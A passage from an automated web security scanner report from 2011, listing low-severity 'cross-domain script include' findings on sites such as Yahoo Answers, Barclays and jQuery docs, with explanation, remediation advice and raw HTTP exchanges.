Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:50 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Set-Cookie: ITD=12268064030%7Cnetworking%20security;domain=.itt-tech.edu;expires=Thu, 25-Apr-2041 13:35:50 GMT;path=/
Set-Cookie: FLOWSIM5=http%3A%2F%2Fwww%2Esedoparking%2Ecom%2Fsearch%2Fregistrar%2Ephp%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking%2Ecom;expires=Thu, 25-Apr-2041 13:35:50 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 25005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1005090170/?label=4QdQCNavnwIQ-uqh3wM&guid=ON&script=0"/>
</div>
...[SNIP]...

23. Cross-domain script include  previous  next
There are 94 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


23.1. http://adomas.org/javascript-mouse-wheel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adomas.org
Path:   /javascript-mouse-wheel/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /javascript-mouse-wheel/ HTTP/1.1
Host: adomas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 03 May 2011 13:07:53 GMT
Content-Type: text/html
Content-Length: 13850
Last-Modified: Tue, 20 Oct 2009 19:28:11 GMT
Connection: close
Accept-Ranges: bytes

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
<title>Mouse wheel programming in JavaScript</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <me
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!-- google analytics -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.2. http://answers.yahoo.com/dir/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /dir/index

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dir/index?sid=396546060&link=list/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dceq_TZrSL46XtweajZmlBQ\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CEIQ6QUoADAD\\x26amp;q\\x3dthailand+breast+slap\\x26amp;usg\\x3dAFQjCNFn83tBoEvYaUFoakb1QJ4CwtpWMQ\\x22\\x3eSkin HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:14:25 GMT
Set-Cookie: B=9f99su16rvvth&b=3&s=nr; expires=Tue, 03-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Imagetoolbar:
Set-Cookie: answers=MElW60OJ6A1Bp.a9wfsEBwX1zTUGd75.7B42VHsmXSuyjyJxa1alWKgRWrFptqUxPFL4Pz71yjVp3Bv6Q8bXrl3RBjZ.I.H1_PORGQ6Q6SLSUBdc7SOe6yxXAdbjc2JsvXMDcietDlPP.JVCgD2yCkJHhZj8kPQJeWIn72TiYr1LKSErjoEyPNf6p7MrJgjn800FPLihKVCWJWilQySv5.p5q1Yz0E9T5UJaWZd6RL8C_J4Pov2spwew2tixt21pzLRitqtZuVPZN71Vqza5kmcYOGsvDwLf.nfDKj2x9euUi_tYpL1IM6wM2YC4NGt8MbWYaVdXcjdgXjwHxMl81zVFqTROCl37O9YFTxI4sX0cPokjFtY.RR4wjvhbOPXSE8Ns4tydNGsjZIc8bdTsQcNjOIor6g7pTHA.YiWXdGieZk0Uw8tD4m.obe5DyNpiq0KQbOhPkqzNaRUJK8D8gcatPLoPdCKfDD8_goW4ZXUk9KTF1AiKiU.34kAy7KpfBXDuwAicZsClCYiChF.85QT3lRSLvs9I2FDWuN0CrCMCwTPDss8dPrlQSbkP2tLCgxQ8fyTLjdPg0a87IgHi7C5O3TqB5VK6V74s.aq8RKk7iKTm_hlIkf6yGQo3.0Hkbq_Df8HiGaQ1qkKBuGM-; expires=Thu, 03-May-2012 13:14:25 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 95591

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-us" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print" href="http://l.yimg.com/h/28150/css/print.css">
<script type="text/javascript" src="http://l.yimg.com/h/28150/js/answers-fe-us.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
138.13401917.12814488/D=know/S=1182000308:FOOT9/Y=YAHOO/EXP=1304435665/L=iYjIVUWTZOOEX8JLFd1j0wAIrcHW802__7EACBsq/B=FZPkm0wNO7U-/J=1304428465731739/K=FYs08IjBKeknfTSi5P8btg/A=5619035/R=0/* --> <script type="text/javascript"src="http://l.yimg.com/d/lib/rt/rto1_78.js"></script>
...[SNIP]...

23.3. http://answers.yahoo.com/dir/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /dir/index

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dir/index HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:14:24 GMT
Set-Cookie: B=19galq96rvvtg&b=3&s=ms; expires=Tue, 03-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Imagetoolbar:
Set-Cookie: answers=lnNtoV.J6A05H.TGewyRWub06PFmg.8lobmORupvn6CkoiDzOlmF4ZCYHq53uj7SPRS3PSGPDEvU_qNBXNlZb0.PRA8hV0DBSNm.7JpT9JobS843EZCaVwZgoQzl7PIfU_KIn2imxG0oJUUJzwzRE8HQU7KDfi5OO99qNOjQlOneWp8ieXG_yXvvUwnt5PdPItrUbpJ4.wiS8Nekw706wGoUdv2dvG9XRC77kwK939YrQwzJLRvWKbRFyABMUGpBras5kjJtlM9cI7jefA4tLGXxJh_rKm8Hmf4MvAd4oJTLs7KPSs8emMcAhuQg2cZZ.GR88RHIDVsbWxCQ4jcmuBSjN8GUCxPjoGNC4km.shCRuvtKX_1KJDEwy.JyNkBuELE51V7q0obDAPMQxO5HnHu6Ix8yGOopJMmS_QlV7vXCP04fijuYMrck1axEgwguUa6zSlJm.vl4CAVkbyPa6rzwe43pmrBJSnZaYpSAxmVej3hUEJWDX8B6pUMYRms7gu_UdBQ4Mzrc411EMSlAejUdfyQHHEAJxFh_GDmqLqV6I572R.xt8Fe.WStK1A9ERU83X17RFeSyMA.T8S7X5OUX42nXFONwPPTWzagOMVKcArc4ODuAkHNUd5JDBf_KiJdqth.8ndJCJ1Nh2YQ-; expires=Thu, 03-May-2012 13:14:25 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 79733

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-us" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print" href="http://l.yimg.com/h/28150/css/print.css">
<script type="text/javascript" src="http://l.yimg.com/h/28150/js/answers-fe-us.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</script><script src="http://ads.yimg.com/a/a/1-/jscodes/flash9/rec_9as2_20081114.js"></script>
...[SNIP]...

23.4. http://answers.yahoo.com/question/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /question/index

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /question/index HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:14:23 GMT
Set-Cookie: B=8i001rh6rvvtf&b=3&s=qp; expires=Tue, 03-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Status: 404 Not Found
Imagetoolbar:
Set-Cookie: answers=MmD4EaSX6A0kmA76gW8c7h3Hi.9jI4cnSXqZz5gFTu0CNQbcLf_aPusEdOiVpQsztBEQGHjrKI4F5Ll4WUrkhPTjKQAVcPGHnlEyZb1gyapSA3QSsaF2DvZgDesI5gyb_U4BraGydvrs3782csAPzxzCLudhFqk1hcw2.zvzuV8Tgy6EAesWIlc9R18TcvuTPLgMSc_GvH9SKG3Mnksbtui.YosZOKVQ3eN81d23SPXuJ5wV1tFt_GbMNFJWgWmXqQy9SSEBgCsVptWGJ1RT6UeEIEk5_DLnSeMkzfpNQ5_.P0hvvX24WR_e3hen1eNVDR4g9uU2sWEO.bJdZYhObARQzppkU7iijImyhHeD2NSrhjaPUNEHcG.Nk72Q.hVCJ3E9FHn4GL0Mr3ifz4tIAD3NB7zQgQ_ff3VpiuoWJfENCk.9AVX0UOFjiR.D9QSrfP0Ap6vYJvKMmMpW_6TcXIS4cbqTTCODs2wT3D0U5uUpnIdXBFgWPi8-; expires=Thu, 03-May-2012 13:14:23 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 31139

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-us" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print" href="http://l.yimg.com/h/28150/css/print.css">
<script type="text/javascript" src="http://l.yimg.com/h/28150/js/answers-fe-us.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
4138.13401917.12814488/D=know/S=396545076:FOOT9/Y=YAHOO/EXP=1304435663/L=Zzk2mkWTZOMvoGPiZActAQHlrcHW802__68ABsxy/B=i6ePK2KIml4-/J=1304428463538561/K=2hSEAEP1zdqEsdsvjpoYsg/A=5619035/R=0/* --> <script type="text/javascript"src="http://l.yimg.com/d/lib/rt/rto1_78.js"></script>
...[SNIP]...

23.5. https://apps.barclays.co.uk/webchat/invite_accept.jpg/u0022  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.barclays.co.uk
Path:   /webchat/invite_accept.jpg/u0022

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webchat/invite_accept.jpg/u0022 HTTP/1.1
Host: apps.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454253315:ss=1304454071727; ssuserid=173.193.214.243.1304418119808638; mbox=check#true#1304436224|session#1304436163124-351101#1304438024;

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:56:58 GMT
Server: Apache
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: text/html
Content-Length: 10710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Persona
...[SNIP]...
</script>
<script type="text/javascript" src="http://barclays.metafaq.com/clients/barclays/scripts.js"></script>
...[SNIP]...

23.6. https://apps.barclays.co.uk/webchat/invite_background.jpg/u0022  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.barclays.co.uk
Path:   /webchat/invite_background.jpg/u0022

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webchat/invite_background.jpg/u0022 HTTP/1.1
Host: apps.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454253315:ss=1304454071727; ssuserid=173.193.214.243.1304418119808638; mbox=check#true#1304436224|session#1304436163124-351101#1304438024;

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:56:21 GMT
Server: Apache
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: text/html
Content-Length: 10710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Persona
...[SNIP]...
</script>
<script type="text/javascript" src="http://barclays.metafaq.com/clients/barclays/scripts.js"></script>
...[SNIP]...

23.7. https://apps.barclays.co.uk/webchat/invite_decline_bottom.jpg/u0022  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.barclays.co.uk
Path:   /webchat/invite_decline_bottom.jpg/u0022

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webchat/invite_decline_bottom.jpg/u0022 HTTP/1.1
Host: apps.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454253315:ss=1304454071727; ssuserid=173.193.214.243.1304418119808638; mbox=check#true#1304436224|session#1304436163124-351101#1304438024;

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:57:04 GMT
Server: Apache
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: text/html
Content-Length: 10710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Persona
...[SNIP]...
</script>
<script type="text/javascript" src="http://barclays.metafaq.com/clients/barclays/scripts.js"></script>
...[SNIP]...

23.8. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.wikipedia.org
Path:   /wiki/Liste_der_Banken_in_Thailand

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/Liste_der_Banken_in_Thailand HTTP/1.1
Host: de.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 12:27:27 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: de
Vary: Accept-Encoding,Cookie
Last-Modified: Tue, 28 Dec 2010 14:20:43 GMT
Content-Length: 26907
Content-Type: text/html; charset=UTF-8
Age: 89523
X-Cache: HIT from sq65.wikimedia.org
X-Cache-Lookup: HIT from sq65.wikimedia.org:3128
X-Cache: MISS from sq59.wikimedia.org
X-Cache-Lookup: MISS from sq59.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="de" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/w/extensions-1.17/WikimediaMobile/MobileRedirect.js?8.2" type="text/javascript"></script>
...[SNIP]...
<!-- /footer -->
       
<script src="http://bits.wikimedia.org/de.wikipedia.org/load.php?debug=false&amp;lang=de&amp;modules=startup&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://bits.wikimedia.org/w/extensions-1.17/FlaggedRevs/client/flaggedrevs.js?87&amp;301-2" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://bits.wikimedia.org/de.wikipedia.org/load.php?debug=false&amp;lang=de&amp;modules=site&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

23.9. http://dl.scriptlogic.com/login/Combined.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dl.scriptlogic.com
Path:   /login/Combined.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /login/Combined.aspx?pid=108&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com HTTP/1.1
Host: dl.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: EntryPoint=/int/am/prodsel/050709; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM; .ASPXANONYMOUS=cqPanChAzAEkAAAAMzRlNGY3MDktMmFiNC00YjcwLWI1ZTUtNzMxMzQ2ZDNhMThkvhu5LlNWIOX87OvHHDmbnJiqCYE1; ASP.NET_SessionId=g4zakovk25b4fty3jwvkx2mu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:45:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ScriptLogic &
...[SNIP]...
<!-- LiveBall Tag Javascript begins -->
<script type="text/javascript" src="https://scriptlogic.postclickmarketing.com/Outside/liveball.js"></script>
...[SNIP]...

23.10. http://docs.jquery.com/UI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Tue, 03 May 2011 13:20:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 14 Mar 2011 17:20:42 GMT
Content-language: en
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.11. http://docs.jquery.com/UI/Accordion  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Accordion

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Accordion HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Tue, 03 May 2011 13:21:19 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 21 Mar 2011 17:11:30 GMT
Content-Length: 45021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.12. http://docs.jquery.com/UI/Button  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Button

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Button HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Tue, 03 May 2011 13:21:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 21 Mar 2011 17:11:30 GMT
Content-Length: 29330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.13. http://docs.jquery.com/UI/Effects/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Effects/ HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Tue, 03 May 2011 13:21:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 14 Mar 2011 17:20:42 GMT
Content-Length: 18322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.14. http://docs.jquery.com/UI/Effects/Slide  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Slide

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Effects/Slide HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Tue, 03 May 2011 13:21:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 21 Mar 2011 17:11:30 GMT
Content-language: en
Content-Length: 18254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.15. http://docs.jquery.com/UI/Mouse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Mouse

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Mouse HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Tue, 03 May 2011 13:20:43 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-Length: 14192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.16. http://docs.jquery.com/UI/Slider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Slider

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Slider HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Tue, 03 May 2011 13:21:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 21 Mar 2011 17:11:30 GMT
Content-Length: 37440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
